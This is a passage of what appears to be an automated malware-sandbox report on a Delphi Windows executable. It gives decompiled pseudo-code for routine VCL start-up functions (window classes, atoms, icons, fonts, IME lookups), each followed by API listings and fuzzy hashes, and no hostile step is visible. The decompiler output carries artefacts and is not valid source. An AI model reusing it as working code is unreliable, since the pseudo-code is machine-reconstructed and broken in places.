                                                                                					_t87 = RegisterClassA(0x46bc08);
                                                                                					if(_t87 == 0) {
                                                                                						_t63 =  *0x486a78; // 0x41cc54
                                                                                						E00406520(_t63,  &_v48);
                                                                                						E0040A0B0(_v48, 1);
                                                                                						E00403D80();
                                                                                					}
                                                                                				}
                                                                                				_t28 =  *0x486b30; // 0x487a94
                                                                                				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
                                                                                				if(_t87 < 0) {
                                                                                					asm("adc eax, 0x0");
                                                                                				}
                                                                                				_t32 =  *0x486b30; // 0x487a94
                                                                                				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
                                                                                				if(_t87 < 0) {
                                                                                					asm("adc eax, 0x0");
                                                                                				}
                                                                                				_push(_t35);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_t36 =  *0x487714; // 0x400000
                                                                                				_push(_t36);
                                                                                				_push(0);
                                                                                				_t7 = _t68 + 0x8c; // 0x27800044
                                                                                				_t38 = E004047D0( *_t7);
                                                                                				_t39 =  *0x46bc2c; // 0x45406c, executed
                                                                                				_t40 = E00407288(_t39, 0x84ca0000, _t38); // executed
                                                                                				 *(_t68 + 0x30) = _t40;
                                                                                				_t9 = _t68 + 0x8c; // 0x44c59c
                                                                                				E00404320(_t9);
                                                                                				 *((char*)(_t68 + 0xa4)) = 1;
                                                                                				_t11 = _t68 + 0x40; // 0x10940000
                                                                                				_t12 = _t68 + 0x30; // 0xe
                                                                                				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                                				_t46 =  *0x486b9c; // 0x487b68
                                                                                				if( *_t46 != 0) {
                                                                                					_t54 = E00454F78(_t68);
                                                                                					_t13 = _t68 + 0x30; // 0xe
                                                                                					SendMessageA( *_t13, 0x80, 1, _t54); // executed
                                                                                					_t58 = E00454F78(_t68);
                                                                                					_t14 = _t68 + 0x30; // 0xe
                                                                                					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
                                                                                				}
                                                                                				_t15 = _t68 + 0x30; // 0xe
                                                                                				_t69 = GetSystemMenu( *_t15, "true");
                                                                                				DeleteMenu(_t69, 0xf030, 0);
                                                                                				DeleteMenu(_t69, 0xf000, 0);
                                                                                				_t51 =  *0x486b9c; // 0x487b68
                                                                                				if( *_t51 != 0) {
                                                                                					DeleteMenu(_t69, 0xf010, 0);
                                                                                				}
                                                                                				goto L13;
                                                                                			}





























                                                                                APIs
                                                                                  • Part of subcall function 0041C940: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                • GetClassInfoA.USER32 ref: 004543D9
                                                                                • RegisterClassA.USER32 ref: 004543F1
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                • SetWindowLongA.USER32 ref: 0045448D
                                                                                • SendMessageA.USER32 ref: 004544AF
                                                                                • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544C2
                                                                                • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544CD
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544DC
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544E9
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 00454500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                • String ID: HpH$h{H$l@E
                                                                                • API String ID: 2103932818-3227393362
                                                                                • Opcode ID: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction ID: 6e4c490b6783f64956c43e3ed911a1460050a66f9724ccd8e5ea5c6e1907debb
                                                                                • Opcode Fuzzy Hash: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction Fuzzy Hash: 2A416270744200ABE710EF69DC81F6A37A8AB45308F55457AFE00EF2D3EA78B8448769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E004409C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				long _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t25;
                                                                                				char _t29;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr _t38;
                                                                                				intOrPtr _t47;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr* _t50;
                                                                                				intOrPtr _t53;
                                                                                				struct HINSTANCE__* _t63;
                                                                                				intOrPtr* _t78;
                                                                                				intOrPtr* _t80;
                                                                                				intOrPtr _t83;
                                                                                				void* _t87;
                                                                                
                                                                                				_v20 = 0;
                                                                                				_v8 = 0;
                                                                                				_push(_t87);
                                                                                				_push(0x440b38);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                                				_v16 = GetCurrentProcessId();
                                                                                				_v12 = 0;
                                                                                				E004092A0("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                                				E00404374(0x487b74, _v8);
                                                                                				_t25 =  *0x487b74; // 0x22e0e78
                                                                                				 *0x487b70 = GlobalAddAtomA(E004047D0(_t25));
                                                                                				_t29 =  *0x487714; // 0x400000
                                                                                				_v36 = _t29;
                                                                                				_v32 = 0;
                                                                                				_v28 = GetCurrentThreadId();
                                                                                				_v24 = 0;
                                                                                				E004092A0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                                				E00404374(0x487b78, _v20);
                                                                                				_t35 =  *0x487b78; // 0x22e0e94
                                                                                				 *0x487b72 = GlobalAddAtomA(E004047D0(_t35));
                                                                                				_t38 =  *0x487b78; // 0x22e0e94
                                                                                				 *0x487b7c = RegisterClipboardFormatA(E004047D0(_t38));
                                                                                				 *0x487bb4 = E004141BC(1);
                                                                                				E004405C4();
                                                                                				 *0x487b64 = E004403EC(1, 1);
                                                                                				_t47 = E00452F98(1, __edi);
                                                                                				_t78 =  *0x486dac; // 0x487c00
                                                                                				 *_t78 = _t47;
                                                                                				_t49 = E0045407C(0, 1);
                                                                                				_t80 =  *0x486c60; // 0x487bfc
                                                                                				 *_t80 = _t49;
                                                                                				_t50 =  *0x486c60; // 0x487bfc
                                                                                				E00455B88( *_t50, 1);
                                                                                				_t53 =  *0x4302b8; // 0x4302bc
                                                                                				E00413760(_t53, 0x4327b4, 0x4327c4);
                                                                                				_t63 = GetModuleHandleA("USER32");
                                                                                				if(_t63 != 0) {
                                                                                					 *0x46b8cc = GetProcAddress(_t63, "AnimateWindow");
                                                                                				}
                                                                                				_pop(_t83);
                                                                                				 *[fs:eax] = _t83;
                                                                                				_push(0x440b3f);
                                                                                				E00404320( &_v20);
                                                                                				return E00404320( &_v8);
                                                                                			}

























                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                • RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004141BC: RtlInitializeCriticalSection.KERNEL32(004119BC,?,?,00440A91,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004141DB
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                  • Part of subcall function 004405C4: GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                  • Part of subcall function 004405C4: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                  • Part of subcall function 00452F98: GetKeyboardLayout.USER32 ref: 00452FDD
                                                                                  • Part of subcall function 00452F98: GetDC.USER32(00000000), ref: 00453032
                                                                                  • Part of subcall function 00452F98: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045303C
                                                                                  • Part of subcall function 00452F98: ReleaseDC.USER32 ref: 00453047
                                                                                  • Part of subcall function 0045407C: LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                  • Part of subcall function 0045407C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                  • Part of subcall function 0045407C: OemToCharA.USER32(?,?), ref: 004541A6
                                                                                  • Part of subcall function 0045407C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                                                • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                • API String ID: 2984857458-1126952177
                                                                                • Opcode ID: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction ID: cf8f2e16a86b900fa348f6b4382c58bee2ff4fefe60cf267411a8d94096d9238
                                                                                • Opcode Fuzzy Hash: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction Fuzzy Hash: 484160B0A042449FD700EFB9D992A4E77B9EB49308B50497FF500E73A2DB38A910CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0045407C(void* __ecx, char __edx) {
                                                                                				char _v5;
                                                                                				char _v261;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t39;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t43;
                                                                                				struct HINSTANCE__** _t53;
                                                                                				struct HICON__* _t55;
                                                                                				intOrPtr _t58;
                                                                                				struct HINSTANCE__** _t60;
                                                                                				void* _t67;
                                                                                				char* _t69;
                                                                                				char* _t75;
                                                                                				intOrPtr _t81;
                                                                                				intOrPtr* _t88;
                                                                                				intOrPtr* _t89;
                                                                                				intOrPtr _t90;
                                                                                				void* _t91;
                                                                                				char _t93;
                                                                                				void* _t104;
                                                                                				void* _t105;
                                                                                
                                                                                				_t93 = __edx;
                                                                                				_t91 = __ecx;
                                                                                				if(__edx != 0) {
                                                                                					_t105 = _t105 + 0xfffffff0;
                                                                                					_t39 = E00403918(_t39, _t104);
                                                                                				}
                                                                                				_v5 = _t93;
                                                                                				_t90 = _t39;
                                                                                				E0041B8BC(_t91, 0);
                                                                                				_t42 =  *0x486be0; // 0x46b468
                                                                                				if( *((short*)(_t42 + 2)) == 0) {
                                                                                					_t89 =  *0x486be0; // 0x46b468
                                                                                					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                                					 *_t89 = 0x4556b0;
                                                                                				}
                                                                                				_t43 =  *0x486c7c; // 0x46b470
                                                                                				_t109 =  *((short*)(_t43 + 2));
                                                                                				if( *((short*)(_t43 + 2)) == 0) {
                                                                                					_t88 =  *0x486c7c; // 0x46b470
                                                                                					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                                					 *_t88 = E004558A8;
                                                                                				}
                                                                                				 *((char*)(_t90 + 0x34)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
                                                                                				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                                				 *((char*)(_t90 + 0x7c)) = 1;
                                                                                				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                                				 *((char*)(_t90 + 0x88)) = 0;
                                                                                				 *((char*)(_t90 + 0x9d)) = 1;
                                                                                				 *((char*)(_t90 + 0xb4)) = 1;
                                                                                				_t103 = E00425320(1);
                                                                                				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                                				_t53 =  *0x486b10; // 0x48702c
                                                                                				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                                				E004256F0(_t103, _t55);
                                                                                				_t20 = _t90 + 0x98; // 0x736d
                                                                                				_t58 =  *_t20;
                                                                                				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 0x455e18;
                                                                                				_t60 =  *0x486b10; // 0x48702c
                                                                                				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                                				OemToCharA( &_v261,  &_v261);
                                                                                				_t67 = E0040AC1C(0x5c, _t109);
                                                                                				_t110 = _t67;
                                                                                				if(_t67 != 0) {
                                                                                					_t27 = _t67 + 1; // 0x1
                                                                                					E00408B7C( &_v261, _t27);
                                                                                				}
                                                                                				_t69 = E0040AC44( &_v261, 0x2e, _t110);
                                                                                				if(_t69 != 0) {
                                                                                					 *_t69 = 0;
                                                                                				}
                                                                                				CharLowerA( &(( &_v261)[1]));
                                                                                				_t31 = _t90 + 0x8c; // 0x44c59c
                                                                                				E00404588(_t31, 0x100,  &_v261);
                                                                                				_t75 =  *0x486a08; // 0x487034
                                                                                				if( *_t75 == 0) {
                                                                                					E00454384(_t90, _t90, 0x100); // executed
                                                                                				}
                                                                                				 *((char*)(_t90 + 0x59)) = 1;
                                                                                				 *((char*)(_t90 + 0x5a)) = 1;
                                                                                				 *((char*)(_t90 + 0x5b)) = 1;
                                                                                				 *((char*)(_t90 + 0x9e)) = 1;
                                                                                				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                                				E00455FF4(_t90, 0x100);
                                                                                				E00456934(_t90);
                                                                                				_t81 = _t90;
                                                                                				if(_v5 != 0) {
                                                                                					E00403970(_t81);
                                                                                					_pop( *[fs:0x0]);
                                                                                				}
                                                                                				return _t90;
                                                                                			}

                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                • OemToCharA.USER32(?,?), ref: 004541A6
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: ,pH$4pH$MAINICON
                                                                                • API String ID: 3935243913-227882389
                                                                                • Opcode ID: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction ID: dc94394b66be5087aa4e9421e0b69953404944942399699dc66eb831b3e2a9c9
                                                                                • Opcode Fuzzy Hash: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction Fuzzy Hash: 375194706042449FDB40EF39C885B897BE4AB15308F4540BAEC48DF397DBB9D988CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E00453774(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                                				char _v5;
                                                                                				struct tagLOGFONTA _v65;
                                                                                				struct tagLOGFONTA _v185;
                                                                                				struct tagLOGFONTA _v245;
                                                                                				void _v405;
                                                                                				void* _t23;
                                                                                				int _t27;
                                                                                				void* _t30;
                                                                                				intOrPtr _t38;
                                                                                				struct HFONT__* _t41;
                                                                                				struct HFONT__* _t45;
                                                                                				struct HFONT__* _t49;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t54;
                                                                                				void* _t57;
                                                                                				void* _t72;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				intOrPtr _t76;
                                                                                
                                                                                				_t72 = __edi;
                                                                                				_t74 = _t75;
                                                                                				_t76 = _t75 + 0xfffffe6c;
                                                                                				_t57 = __eax;
                                                                                				_v5 = 0;
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t54 =  *0x487bfc; // 0x22e1310
                                                                                					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                                                				}
                                                                                				_push(_t74);
                                                                                				_push(0x4538b9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t52 =  *0x487bfc; // 0x22e1310
                                                                                					E00455B88(_t52, 0);
                                                                                				}
                                                                                				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                                					_t23 = GetStockObject(0xd);
                                                                                					_t7 = _t57 + 0x84; // 0x38004010
                                                                                					E0041ED08( *_t7, _t23, _t72);
                                                                                				} else {
                                                                                					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                                					_t6 = _t57 + 0x84; // 0x38004010
                                                                                					E0041ED08( *_t6, _t49, _t72);
                                                                                				}
                                                                                				_v405 = 0x154;
                                                                                				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                                                				if(_t27 == 0) {
                                                                                					_t14 = _t57 + 0x80; // 0x94000000
                                                                                					E0041EDEC( *_t14, 8);
                                                                                					_t30 = GetStockObject(0xd);
                                                                                					_t15 = _t57 + 0x88; // 0x90000000
                                                                                					E0041ED08( *_t15, _t30, _t72);
                                                                                				} else {
                                                                                					_t41 = CreateFontIndirectA( &_v185);
                                                                                					_t11 = _t57 + 0x80; // 0x94000000
                                                                                					E0041ED08( *_t11, _t41, _t72);
                                                                                					_t45 = CreateFontIndirectA( &_v245);
                                                                                					_t13 = _t57 + 0x88; // 0x90000000
                                                                                					E0041ED08( *_t13, _t45, _t72);
                                                                                				}
                                                                                				_t16 = _t57 + 0x80; // 0x94000000
                                                                                				E0041EB4C( *_t16, 0x80000017);
                                                                                				_t17 = _t57 + 0x88; // 0x90000000
                                                                                				E0041EB4C( *_t17, 0x80000007);
                                                                                				 *[fs:eax] = 0x80000007;
                                                                                				_push(0x4538c0);
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t38 =  *0x487bfc; // 0x22e1310
                                                                                					return E00455B88(_t38, _v5);
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004537C8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004537D5
                                                                                • GetStockObject.GDI32(0000000D), ref: 004537EB
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00453814
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00453824
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0045383D
                                                                                • GetStockObject.GDI32(0000000D), ref: 00453863
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                • String ID:
                                                                                • API String ID: 2891467149-0
                                                                                • Opcode ID: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction ID: 28a1cf3aa5b0351315609d5fbf45b2813be3316eb6b6f31c26dce7917962f236
                                                                                • Opcode Fuzzy Hash: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction Fuzzy Hash: 5731D6747042059BE740FB6ADC56B9A73E4AB04705F5480B6BD08DB3D3DE38ED488B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00452F98(char __edx, void* __edi) {
                                                                                				char _v5;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr* _t28;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t48;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t61;
                                                                                				intOrPtr _t62;
                                                                                				intOrPtr _t65;
                                                                                				void* _t66;
                                                                                				char _t67;
                                                                                				void* _t77;
                                                                                				struct HDC__* _t78;
                                                                                				void* _t79;
                                                                                				void* _t80;
                                                                                
                                                                                				_t77 = __edi;
                                                                                				_t67 = __edx;
                                                                                				if(__edx != 0) {
                                                                                					_t80 = _t80 + 0xfffffff0;
                                                                                					_t25 = E00403918(_t25, _t79);
                                                                                				}
                                                                                				_v5 = _t67;
                                                                                				_t65 = _t25;
                                                                                				E0041B8BC(_t66, 0);
                                                                                				_t28 =  *0x486ab0; // 0x46b458
                                                                                				 *((intOrPtr*)(_t28 + 4)) = _t65;
                                                                                				 *_t28 = 0x45333c;
                                                                                				_t29 =  *0x486abc; // 0x46b460
                                                                                				 *((intOrPtr*)(_t29 + 4)) = _t65;
                                                                                				 *_t29 = 0x453348;
                                                                                				E00453354(_t65);
                                                                                				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
                                                                                				 *((intOrPtr*)(_t65 + 0x4c)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x50)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x54)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x58)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x7c)) = E00403584(1);
                                                                                				_t78 = GetDC(0);
                                                                                				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
                                                                                				ReleaseDC(0, _t78);
                                                                                				_t11 = _t65 + 0x58; // 0x44c4386e
                                                                                				_t48 =  *0x486bf0; // 0x487ab0
                                                                                				 *((intOrPtr*)( *_t48))(0, 0, E0044F81C,  *_t11);
                                                                                				 *((intOrPtr*)(_t65 + 0x84)) = E0041E978(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x88)) = E0041E978(1);
                                                                                				 *((intOrPtr*)(_t65 + 0x80)) = E0041E978(1);
                                                                                				E00453774(_t65, _t65, _t66, _t77);
                                                                                				_t15 = _t65 + 0x84; // 0x38004010
                                                                                				_t59 =  *_t15;
                                                                                				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
                                                                                				 *((intOrPtr*)(_t59 + 8)) = 0x453650;
                                                                                				_t18 = _t65 + 0x88; // 0x90000000
                                                                                				_t60 =  *_t18;
                                                                                				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
                                                                                				 *((intOrPtr*)(_t60 + 8)) = 0x453650;
                                                                                				_t21 = _t65 + 0x80; // 0x94000000
                                                                                				_t61 =  *_t21;
                                                                                				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
                                                                                				 *((intOrPtr*)(_t61 + 8)) = 0x453650;
                                                                                				_t62 = _t65;
                                                                                				if(_v5 != 0) {
                                                                                					E00403970(_t62);
                                                                                					_pop( *[fs:0x0]);
                                                                                				}
                                                                                				return _t65;
                                                                                			}























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                • String ID:
                                                                                • API String ID: 3331096196-0
                                                                                • Opcode ID: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction ID: d6432707c957d0cacee8399d567b12e74fb03ad8e22360b452518030eba30be5
                                                                                • Opcode Fuzzy Hash: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction Fuzzy Hash: A431D9B06002419FD740EF2AD8C1B997BE4AB0535AF44C07EED18DF3A6D779A908CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E0042626C(int _a4) {
                                                                                				void* __ebx;
                                                                                				void* __ebp;
